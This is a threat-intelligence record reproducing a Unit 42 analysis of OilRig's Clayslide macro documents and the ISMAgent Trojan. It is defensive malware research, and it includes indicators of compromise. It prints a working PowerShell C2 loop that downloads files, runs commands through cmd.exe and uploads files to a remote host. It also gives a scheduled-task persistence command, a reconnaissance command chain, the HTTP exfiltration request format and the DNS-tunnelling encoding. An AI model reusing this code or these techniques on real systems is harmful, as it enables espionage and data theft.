{ "id": "5a862fab-6c61-4d5e-9116-39c2ca9ab7fd", "created_at": "2026-04-06T00:18:56.946626Z", "updated_at": "2026-04-10T13:13:10.221896Z", "deleted_at": null, "sha1_hash": "855088aa14275eb4898176957ec27fe16012255c", "title": "OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1407391, "plain_text": "OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat\r\nGroup\r\nBy Robert Falcone, Bryan Lee\r\nPublished: 2017-07-27 · Archived: 2026-04-05 22:36:58 UTC\r\nUnit 42 has discovered activity involving threat actors responsible for the OilRig campaign with a potential link to a threat\r\ngroup known as GreenBug. Symantec first reported on this group back in January 2017, detailing their operations and using\r\na custom information stealing Trojan called ISMDoor.\r\nIn July 2017, we observed an attack on a Middle Eastern technology organization that was also targeted by the OilRig\r\ncampaign in August 2016. Initial inspection of this attack suggested this was again the OilRig campaign using their existing\r\ntoolset, but further examination revealed not only new variants of the delivery document we named Clayslide, but also a\r\ndifferent payload embedded inside it. In the past, we had primarily associated the OilRig campaign with using the Clayslide\r\ndocuments to deliver as a payload a Trojan we named Helminth; in this instance, the payload was instead a variant of the\r\nISMDoor Trojan with significant modifications which we are now tracking as ISMAgent.\r\nThe Attack\r\nOn July 16, 2017, actors associated with the OilRig campaign sent emails to five different individuals within the targeted\r\norganization. All of the emails sent had the same subject, attachment filename, and attached Excel file (SHA256:\r\n3eb14b6705179590f0476d3d3cbd71665e7c1935ecac3df7b876edc9bd7641b6).\r\nWe identified the Excel file attached to the delivery email as a variant of the Clayslide delivery documents used by the\r\nOilRig campaign. A closer look revealed that although it was similar to previous Clayslide documents, it was also quite\r\ndifferent in several aspects. Like the previous samples, it displays a worksheet titled “Incompatible” containing a banner that\r\nshows a fake compatibility warning message (Figure 1). The message is an attempt to trick the user into clicking the “Enable\r\nContent” button, which would run a malicious macro embedded within the Excel file\r\nFigure 1 Incompatible message attempting to trick the victim into enabling macros\r\nThe macro within the delivery document will unhide and display a new worksheet that contains a fake invoice for Citrix\r\nproducts, as seen in Figure 2. This fake invoice acts as a decoy document to minimize the user’s suspicions that any\r\nmalicious activity occurred.\r\nFigure 2 Decoy document opened to minimize suspicions of compromise\r\nWhile the macro displays the decoy invoice spreadsheet, it silently runs malicious code in the background to install its\r\npayload. The malicious code starts by concatenating several base64 encoded strings into a single variable. As you can see in\r\nthe following code snippet, the variable name “Paltofp1” suggests that the author of this code may want our attention:\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 1 of 12\n\nThe macro then writes the concatenated base64 encoded data to the file %PUBLIC%\\Libraries\\B642.txt. It then reads in the\r\n“B642.txt” file and decodes the data, which it will save to the file %PUBLIC%\\Libraries\\servicereset.exe (SHA256:\r\n52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9). The servicereset.exe file is the payload of\r\nthis attack, which is a variant of ISMDoor that we track as ISMAgent.\r\nThe script then creates a file named %PUBLIC%\\Libraries\\OfficeServicesStatus.vbs which contains a VBScript that will\r\nexecute the “servicereset.exe” file using the command line. Lastly, as a persistence mechanism, a scheduled task named\r\n“OfficeServicesStatus” will be created, set to run every three minutes, as seen in Figure 3.\r\nFigure 3 Scheduled task created by the macro within the delivery document\r\nAn Iterative Task\r\nWhile hunting for other samples similar to the one observed in the attack against the technology organization, we discovered\r\nyet another variant of Clayslide (SHA256: 5ac939a5426db8614165bd8b6a02d3e8d9f167379c6ed28025bf3b37f1aea902).\r\nThis sample was dated June 2017, a month older than the newest version containing ISMAgent. Based upon timestamping\r\nand similarities with both the original Clayslide documents as well as the newest ISMAgent loaded ones, we believe this\r\nJune 2016 sample to be an iterative version of Clayslide.\r\nThe June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide\r\ndocument, but instead of having the payload embedded in the macro as segregated base64 strings that would be\r\nconcatenated, this variant obtained its payload from multiple cells within the “Incompatible” worksheet. This technique was\r\nobserved in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks.\r\nAlso, the June 2017 sample contained artifacts observed in previous Clayslide documents as documented in a blog post we\r\npublished in April. Specifically, we found this comment:\r\n1 source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html\r\nalong with the following common function names within the macro code:\r\n1\r\n2\r\n3\r\n4\r\nPrivate Sub Workbook_Open()\r\n     Call fireeye_Init\r\n     Call fireeye_ShowHideSheets\r\nEnd Sub\r\nAlthough structurally the document was more similar to the originally discovered Clayslide documents, this June 2017\r\nsample was designed to load ISMAgent instead of Helminth. We do not have targeting details for this sample, although the\r\ndecoy document contained a similar theme to the newest Clayslide document, displaying vendor related information (Figure\r\n4).\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 2 of 12\n\nFigure 4 Decoy document\r\nA table displaying the differences in each variant of Clayslide is below:\r\nOriginal Clayslide June Clayslide Newest Clayslide\r\nHelminth X\r\nISMAgent X X\r\nOfficeServicesStatus X X\r\nBase64 in multiple cells X X\r\nSource code comment X X\r\nTable 1 Comparison of Clayslide versions\r\nThe payload (SHA256: 52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9) delivered in the June\r\n2016 attack is a variant of the recent ISMDoor versions that use DNS tunneling for its C2 communications. On May 1, 2017,\r\nArbor Networks published research on ISMDoor using DNS tunneling to communicate with its C2 server, which is nearly\r\nidentical to the DNS tunneling the payload of this attack carries out. Due to considerable differences and evidence of\r\npotentially different authors between the previous ISMDoor samples and this newly discovered variant, we are tracking this\r\nnew variant as ISMAgent.\r\nOn-demand Configuration\r\nThe ISMAgent tool comes with a default configuration that specifies the C2 domain and the number of minutes between\r\nfurther attempts to execute the tool. However, an actor can use command line arguments to create a new ISMAgent sample\r\nthat is configured with a specified C2 domain and a specified number of minutes to automatically execute the Trojan. The\r\nfollowing command line arguments are supported:\r\nArgument Description\r\n-c Configures a second domain to use for C2 communications\r\n-m Configures the number of minutes that a scheduled task should execute the payload\r\nTable 2 Command line options available in ISMAgent for configuration\r\nIf the Trojan is executed with these arguments, the Trojan will read its own file data in, and search for two strings of\r\ncharacters within the data that it will overwrite with the configured settings. The Trojan searches for a string of \"^\"\r\ncharacters that it will overwrite with the C2 domain provided via the \"-c\" argument, and it searches for the string \"%%%%\"\r\nthat it will replace with the number of minutes provided via the \"-m\" argument. The \"%%%%\" string exists within the\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 3 of 12\n\nfollowing larger string, that the Trojan uses as a command to execute in order to create a scheduled task named\r\n\"TimeUpdate\" to execute the payload after the specified number of minutes passes:\r\n1\r\ncmd /c schtasks /query /tn TimeUpdate \u0026gt; NUL 2\u0026gt;\u0026amp;1 || schtasks /create /sc minute /mo %%%% /tn\r\nTimeUpdate /tr \\\"\\\\\\\"\r\nCommand and Control\r\nThe Trojan is able to use two mechanisms to communicate with its C2 server: HTTP requests and DNS tunneling. The DNS\r\ntunneling protocol found in this payload is remarkably similar to recent ISMDoor samples, as documented in Arbor\r\nNetworks’ research. Similar message handling is found in both ISMAgent and ISMDoor, in addition to the existence of\r\nstrings in both samples, such the hardcoded IPv6 values. The similarities may allow for backward compatibility between\r\nISMAgent and ISMDoor C2 infrastructure. In the payloads themselves, a number of differences exist, enough that in\r\nessence they appear to be different tools.\r\nRegardless of the communications method used, the Trojan will parse the received data from the C2 server for a GUID field\r\nthat the Trojan will use as a unique identifier, as well as commands the Trojan should run on the compromised system:\r\n1\r\n[GUID provided by C2]#command#[URL to download file to system]#[command to execute via cmd.exe]#[path to\r\nfilename to upload to C2]\r\nHTTP C2 Communications\r\nISMAgent prioritizes HTTP as its mechanism to communicate with the C2 server, but if it is unable to reach the C2 server it\r\nwill switch to the DNS tunneling mechanism. To carry out its HTTP C2 communications, the Trojan prepends \"www.\" to the\r\nconfigured C2 domain and issues a DNS query to resolve this domain. The Trojan will use the resolved IP address as the\r\nhost in the HTTP beacon request.\r\nFor instance, the sample used in this attack was configured to use ntpupdateserver[.]com for its C2 server. The HTTP C2\r\nprocess would attempt to resolve the domain “www.ntpupdateserver[.]com”, which resolved to 142.54.179[.]90, so the\r\nTrojan would use the string “http:/w” as the basis of the C2 URL.  The initial beacon sent from the Trojan to the C2 server\r\nusing a URL structured in the following way:\r\n1 http://[IP of C2 domain]/action2/[base64 encoded hostname\\username]\r\nThe C2 server will respond to this request with a command string using the previously mentioned format. During the attack\r\non the technology organization, we observed the C2 server issuing the following command:\r\n1\r\n2983b983-0acd-42db-9d86-0b096af5f369#command##systeminfo \u0026amp;\u0026amp; ipconfig /all \u0026amp;\u0026amp; net\r\nuser \u0026amp;\u0026amp; net user /domain \u0026amp;\u0026amp; net group /domain \u0026amp;\u0026amp; tasklist \u0026amp;\u0026amp; net stat -\r\nan \u0026amp;\u0026amp; net use#\r\nIf the C2 server provides a command to execute on the system, the Trojan executes it using cmd.exe and writes the output to\r\n%TEMP%\\runlog[random number].tmp. The Trojan will read this runlog file and send it to the C2 server via an HTTP\r\nPOST request to a URL structured as follows:\r\n1 http://[IP of C2 domain]/response/[base64 encoded hostname\\username]/[GUID provided by C2]\r\nThe HTTP POST request contains an anomalous boundary value of “myboundary” and hardcoded filename value of “a.a”,\r\nas seen below, which may be used to generate detection signatures for this behavior:\r\n1\r\n2\r\n3\r\n4\r\n5\r\nPOST /response/[redacted]/2983b983-0acd-42db-9d86-0b096af5f369 HTTP/1.1\r\nHost: 142.54.179.90\r\nContent-Type: multipart/form-data; boundary=myboundary\r\nUser-Agent: Firefox\r\nContent-Length: 3868\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 4 of 12\n\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\nCache-Control: no-cache\r\n--myboundary\r\nContent-Type: application/octet-stream;charset=UTF-8\r\nContent-Disposition: form-data; name=\"file\"; filename=\"a.a\"\r\n[output of command prompt]\r\nWhile we did not observe the C2 server attempting to run additional commands via ISMAgent, we were able to analyze the\r\nTrojan itself to determine the functionality of its available commands. If the command string contains a URL to download a\r\nfile to the system, the Trojan will simply use the URLDownloadToFileA function to download and save the file to the target\r\nsystem in the %TEMP% folder. If the C2 server provides a path to a file it wishes to upload from the system, the Trojan will\r\nopen the file, read its contents, and then upload its contents via an HTTP POST to the following URL:\r\n1 http://[IP of C2 domain]/upload/[base64 encoded hostname\\username]/[GUID provided by C2]\r\nDNS Tunneling for C2\r\nISMAgent uses its DNS tunneling technique for C2 as a backup to its HTTP capability. This mechanism supports the same\r\ncommand message structure and even handles the commands in the same manner. The Trojan sends data to the C2 server via\r\nDNS queries by encoding data and using the encoded string as a subdomain of an actor owned domain. The C2 server can\r\nsend data to the Trojan by resolving the DNS queries to IPv6 addresses that the Trojan treats as hexadecimal data.\r\nTo carry out its DNS C2 communications, the Trojan will issue DNS queries to the C2 domain to obtain the AAAA records\r\nassociated with the domain. The Trojan starts this process by creating a unique GUID and appending it to the string \"n.n.c.\"\r\nto create a subdomain to query in the following format:\r\n1\r\n2\r\nn.n.c.[session value based on GUID].[c2 domain]\r\n(ex: n.n.c.303E5CF0A861479B80E2.ntpupdateserver.com)\r\nTo respond to this beacon, the C2 domain's name server will respond to this query with a hardcoded IPv6 value of\r\na67d:0db8:a2a1:7334:7654:4325:0370:2aa3. This value acts as an acknowledgement of the beacon. The Trojan will then\r\nbase64 encode the HTTP C2 URL it was using and will send this data to the C2 by constructing and issuing the following\r\nDNS query:\r\n1\r\n2\r\n[base64 encoded data].[iterating sequence number].d.[session value based on GUID].[c2 domain]\r\n(ex: aHR0cDovLzE0M.0.d.303E5CF0A861479B80E2.ntpupdateserver.com)\r\nThe Trojan splits up the base64 encoded data across several DNS queries, which we believe the C2 domain's name server\r\npieces together using the supplied sequence numbers. The name server will respond to each of these DNS queries with\r\nanother hardcoded IPv6 value of a67d:0db8:85a3:4325:7654:8a2a:0370:7334 to notify the Trojan that it has received the\r\ndata. After all of the data is successfully sent via DNS requests, the Trojan will send a final DNS query that has the\r\nfollowing structure to notify the C2 server that it has completed its data transfer:\r\n1\r\n2\r\nn.[iterating sequence number].f.[session value based on GUID].[c2 domain]\r\n(ex: n.8.f.303E5CF0A861479B80E2.ntpupdateserver.com)\r\nAfter notifying the C2 server that the data transfer has completed, the Trojan may issue additional DNS queries to notify it is\r\nready to receive data back from the C2 server using the following domain name structure:\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 5 of 12\n\n1 www.[iterating sequence number].r.[session value based on GUID].[c2 domain]\r\nThe DNS server will then respond to these DNS queries with additional IPv6 addresses that the Trojan will treat as\r\nhexadecimal data as described by Arbor Networks.\r\nInfrastructure\r\nThe ISMAgent payload embedded inside the newest variant of Clayslide used the C2 domain ntpupdateserver[.]com. The\r\nprimary second-level domain has no IP resolution, instead relying on www.ntpupdateserver[.]com for resolution then two\r\nspecific subdomains of ns1.ntupdateserver[.]com and ns2.ntpupdateserver[.]com as the actual DNS C2 handler. The\r\nISMAgent payload embedded inside the June version used a completely different C2 domain at Microsoft-publisher[.]com,\r\nbut used the exact same domain name structure. Lastly, we were able to identify a third sample of ISMAgent leveraging\r\nanother unique C2 domain, adobeproduct[.]com.\r\n1\r\n2\r\n3\r\nNtpupdateserver[.]com\r\nMicrosoft-publisher[.]com\r\nAdobeproduct[.]com\r\nFigure 5 Primary C2 domains for ISMAgent\r\nPivoting from the WHOIS registrant email address of paul.mcalister[at]mail.com revealed four additional highly suspect\r\ndomains:\r\n1\r\n2\r\n3\r\n4\r\nfireeyeupdate[.]com\r\nchrome-dns[.]com\r\ntatavpnservices[.]com\r\nmiedafire[.]com\r\nPivoting on the WHOIS phone number we found two additional domains. These are registered with the same Registrar, have\r\nthe same WHOIS address, but the registrant name “bolips Angelio” and email address bolips[at]outlook.com.\r\n1\r\n2\r\ncache-service[.]net\r\nlevel3-resolvers[.]net\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 6 of 12\n\nThematically, these domains follow the pattern of ISMAgent and OilRig C2 domain names, abusing typo-squatting\r\ntechniques in attempts to appear as legitimate domains. Each of these additional domains had the same structure as the three\r\nISMAgent C2 domains, with no IP resolution on the primary second-level domain containing the www, ns1, and ns2\r\nsubdomains. Based off the same registrant email address and domain name structure, it is highly probable these other\r\ndomains are also part of the ISMAgent infrastructure as C2 servers.\r\nLastly, we identified another ISMAgent sample using the C2 domain of adobeproduct[.]com, which again fits thematically\r\nand was also found to have the www, ns1, and ns2 subdomains attached to it.\r\nThese findings are diagrammed below:\r\nFigure 6 ISMAgent C2 Infrastructure\r\nISMAgent vs. ISMDoor\r\nOn the surface, the ISMAgent payload appears similar to the ISMDoor payload, sharing functionality such as a specific\r\nDNS tunneling protocol. However, closer analysis shows there are enough differences between the two payloads that\r\njustifies tracking ISMAgent as its own tool with its own name.\r\nFirst, all known ISMDoor payloads using DNS tunneling were created for 64-bit architectures, while all known ISMAgent\r\nare x86 only. The most recent ISMDoor payloads using DNS tunneling have abandoned HTTP as a C2 communications\r\nmethod compared to earlier ISMDoor samples, whereas ISMAgent uses HTTP as the primary method and DNS tunneling as\r\na secondary method to communicate with its C2 server.\r\nAlso, while the DNS tunneling protocol is the same, the messages within the transmitted encoded data differs dramatically.\r\nAfter the initial \"n.n.c.\" beacon, ISMAgent sends the HTTP C2 URL as the data via the DNS tunneling protocol to send a\r\nbeacon to its C2. During our analysis, we observed the sample used in this attack sending the following data immediately\r\nafter the initial beacon:\r\n1 http://142.54.179[.]90/action2/T0tPODczODAyNTg1NTk4XDVoNkdkTjY5YTR0S0g%3d||\r\nComparatively, ISMDoor sends a much more involved series of messages to the C2 server in order to get a command. The\r\nfollowing is a sequence of messages sent from the ISMDoor Trojan to its C2 server via the DNS tunneling protocol, the last\r\nmessage (\"M:GAC?\") resulting in a command for the Trojan to run:\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 7 of 12\n\n1\r\n2\r\n3\r\n4\r\n5\r\n1. M:CC?\r\n2. M:ME?appId=-1\u0026amp;message=Executed Successfully\r\n3. M:AV?appId=-1\u0026amp;uniqueId=00000000-0000-0000-0000-000000000000\r\n4. M:AV?appId=[appId provided by C2]\u0026amp;uniqueId=[GUID provided by C2]\r\n5. M:GAC?appId=[appId provided by C2]\r\nLastly, the commands available within ISMAgent and ISMDoor are very different. As mentioned previously, ISMAgent has\r\na far more limited, but flexible command set, allowing an adversary to upload and download files, in addition to command\r\nexecution via command prompt. The most recent version of ISMDoor (v 10.0.192 SHA256:\r\naa52dcaf6df43c6aa872fe0f73725f61e082d32c33fc976741d4eca17679533d) on the other hand, has a more comprehensive\r\nyet more rigid command set:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\nChangeAliveSeconds\r\nChangeAddress\r\nSI\r\nGetConfig\r\nRunNewVersion\r\nrestart\r\nremove\r\nFastAlive\r\nExecuteKL\r\nGetVersion\r\nPauseUpload\r\nResumeUpload\r\nPauseDownload\r\nResumeDownload\r\nPWS\r\nImmediateResetRam\r\nFrom Helminth to ISMAgent\r\nDuring our data collection process, we discovered a Clayslide delivery document (SHA256:\r\nca8cec08b4c74cf68c71a39176bfc8ee1ae4372f98f75c892706b2648b1e7530) from September 2016 containing a payload\r\nthat appeared to be the Helminth script variant as found in other Clayslide documents, but upon further examination was\r\nwholly different. The macro within this Clayslide documents obtains a PowerShell script from a cell in the “Incompatible”\r\nworksheet, much like previous samples. The macro then saves a VBScript to %PUBLIC%\\Libraries\\LicenseCheck.vbs to\r\nrun this PowerShell script every 3 minutes.\r\nLike the Helminth script variants, this PowerShell script is a malicious payload that uses both HTTP requests and DNS\r\ntunneling to interact with its C2 server. However, the HTTP requests and the protocol employed to perform DNS tunneling\r\ndiffers dramatically from Helminth scripts installed by all other known Clayslide samples. The HTTP requests and DNS\r\ntunneling protocol found in this PowerShell script are instead identical to ISMAgent.\r\nThe C2 domain used for this script was mslicensecheck[.]com, which had previously been reported by LogRhythm in their\r\nOilRig whitepaper. Interestingly, it was the only domain associated with OilRig that did not have an IP resolution at its\r\nsecond-level, much like the ISMAgent samples.\r\nThe “doIt” function within the PowerShell script, seen in Figure 7, is responsible for initiating the C2 communications, as\r\nwell as parsing the data provided by the C2 server to run the appropriate commands. This function uses the strings\r\n“/action2/”, “/response/” and “/upload/” within the C2 URLs when using HTTP to communicate with the C2 server. This\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 8 of 12\n\nbehavior and these strings were also observed in the ISMAgent C2 behavior. The “doIt” function also shows that the C2\r\nserver will respond with data structured the same way as ISMAgent, using “#” as a delimiter and various offsets such as\r\noffset 0 used in subsequent requests with the C2, offset 2 specifying a URL to download a file from, offset 3 specifying a\r\ncommand to execute using command-prompt, and offset 4 specifying a path to a file to upload to the C2 server.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\nfunction doIt(){\r\n  try{\r\n   while($true){\r\n    $res = get($ha+\"/action2/\"+$id)\r\n    $p = $res.split('#')\r\n    if ($p.Length -lt 5) { break }\r\n    $res = $tmp+$p[0]\r\n    $u = $ha+\"/response/\"+$id+\"/\"+$p[0]\r\n    if ($p[2] -ne '') {\r\n     $name= $p[2].SubString($p[2].LastIndexOf(\"/\")+1)\r\n     download $p[2] ($tmp+$name)\r\n     [IO.File]::WriteAllText($res,\"done\", [System.Text.Encoding]::Unicode)\r\n    }\r\n    if($p[3] -ne ''){\r\n     $p[3] | cmd.exe \u0026gt;\u0026gt; $res\r\n    }\r\n    if($p[4] -ne ''){\r\n     upload $u.Replace(\"/response/\",\"/upload/\") $p[4]\r\n    }\r\n    upload $u $res\r\n    [IO.File]::Delete($res)\r\n   }\r\n  } catch {}\r\n}\r\nFigure 7 The 'doIt' function within the PowerShell script handles C2 interaction and functionality\r\nThe commonalities between this PowerShell script and ISMAgent do not stop there. The HTTP requests to the C2 server use\r\nthe exact same URL structure. For instance, the payload generates a URL using the following line of code, which results in a\r\nbase64 encoded string that contains [hostname/username]:\r\n1\r\n$id=\r\n[Convert]::ToBase64String($Enc.GetBytes([System.Net.Dns]::GetHostEntry([string]\"localhost\").HostName+\"/\"+$env:username)).Replace('=','%3\r\nAlso, as seen in the code above, the PowerShell script makes sure the base64 encoded data used is safe to use in an HTTP\r\nURL, by replacing the characters “=”, “/” and “+” characters with hexadecimal equivalent. The ISMAgent payloads also\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 9 of 12\n\nperformed the exact same replacement, as seen in the portion of code in Figure 8.\r\nFigure 8 Code within ISMAgent payload that overlaps character replacement HTTP communications functionality within\r\nPowerShell script\r\nThe DNS tunneling protocol within the PowerShell script is the same as the ISMAgent payload, which can be visualized by\r\nthe following beacon sent from the PowerShell script:\r\n1 n.n.c.55957d20569c43c9a401e5d446b92b9e.mslicensecheck.com\r\nTo facilitate the DNS tunneling functionality, the PowerShell script replaces the “=”, “/” and “+” characters within the\r\nbase64 data sent to the C2 server within the subdomains of DNS queries. However, DNS queries cannot include the “%”\r\ncharacter, so it uses the following line of code to replace them with “-“, “-s-“ and “-p-“ instead:\r\n1 $b64=[Convert]::ToBase64String($dt).Replace('=','-').Replace(\"/\",\"-s-\").Replace(\"+\",\"-p-\")\r\nThis functionality is again replicated within the ISMAgent payload for its DNS tunneling functionality, as shown in Figure\r\n9.\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 10 of 12\n\nFigure 9 Code within ISMAgent payload that overlaps character replacement within DNS tunneling functionality within\r\nPowerShell script\r\nConclusion\r\nThe OilRig campaign has repeatedly demonstrated a willingness and desire to be iterative in their toolset, while maintaining\r\nsome level of similarities over time. In this scenario, we were able to directly observe this type of behavior, while also\r\nimplement a tool thought to be previously unrelated to OilRig. With the inclusion of ISMAgent within the OilRig toolset, we\r\nare beginning to see stronger relationships between the various documented groups operating in the Middle East. This region\r\nhas proven to be a hot bed of espionage motivated activity over the last couple of years, and there appear to be no signs of\r\nthis changing. As our research continues, our goal will be to generate even better understandings of the true extent of the\r\nvarious operations in this region and the relationships between them.\r\nPalo Alto Networks customers are protected and may learn more via the following:\r\nSamples are classified as malicious by WildFire and Traps prevents their execution\r\nDomains and IPs have been classified as malicious and IPS signatures generated\r\nAutoFocus users may learn more via the ISMAgent and Clayslide tags\r\nIndicators of Compromise\r\nClayslide delivering ISMAgent\r\n3eb14b6705179590f0476d3d3cbd71665e7c1935ecac3df7b876edc9bd7641b6\r\n5ac939a5426db8614165bd8b6a02d3e8d9f167379c6ed28025bf3b37f1aea902\r\nISMAgent payloads\r\nbbfc05177e5e29b3c8c4ef0148969d07e6239140da5bff57473c32409e76c070\r\n52366b9ab2eb1d77ca6719a40f4779eb302dca97a832bd447abf10512dc51ed9\r\naf4d8604d0cd09b8dc01dbafc33c6d240d356cad366f9917192a2725e0121a0d\r\nISMAgent C2\r\nAdobeproduct[.]com\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 11 of 12\n\nntpupdateserver[.]com\r\nmicrosoft-publisher[.]com\r\nRelated infrastructure\r\nMiedafire[.]com\r\ntatavpnservices[.]com\r\nchrome-dns[.]com\r\nfireeyeupdate[.]com\r\ncache-service[.]net\r\nlevel3-resolvers[.]net\r\nMslicensecheck[.]com\r\nSource: https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nhttps://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/" ], "report_names": [ "unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group" ], "threat_actors": [ { "id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed", "created_at": "2022-10-25T16:07:23.918534Z", "updated_at": "2026-04-10T02:00:04.789509Z", "deleted_at": null, "main_name": "Greenbug", "aliases": [ "Greenbug", "Volatile Kitten" ], "source_name": "ETDA:Greenbug", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "25896473-161f-411f-b76a-f11bb26c96bd", "created_at": "2023-01-06T13:46:38.75749Z", "updated_at": "2026-04-10T02:00:03.090307Z", "deleted_at": null, "main_name": "CHRYSENE", "aliases": [ "Greenbug" ], "source_name": "MISPGALAXY:CHRYSENE", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6bba8e81-73af-4010-86dc-d43c408ca342", "created_at": "2023-01-06T13:46:38.553459Z", "updated_at": "2026-04-10T02:00:03.021597Z", "deleted_at": null, "main_name": "Greenbug", "aliases": [], "source_name": "MISPGALAXY:Greenbug", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], 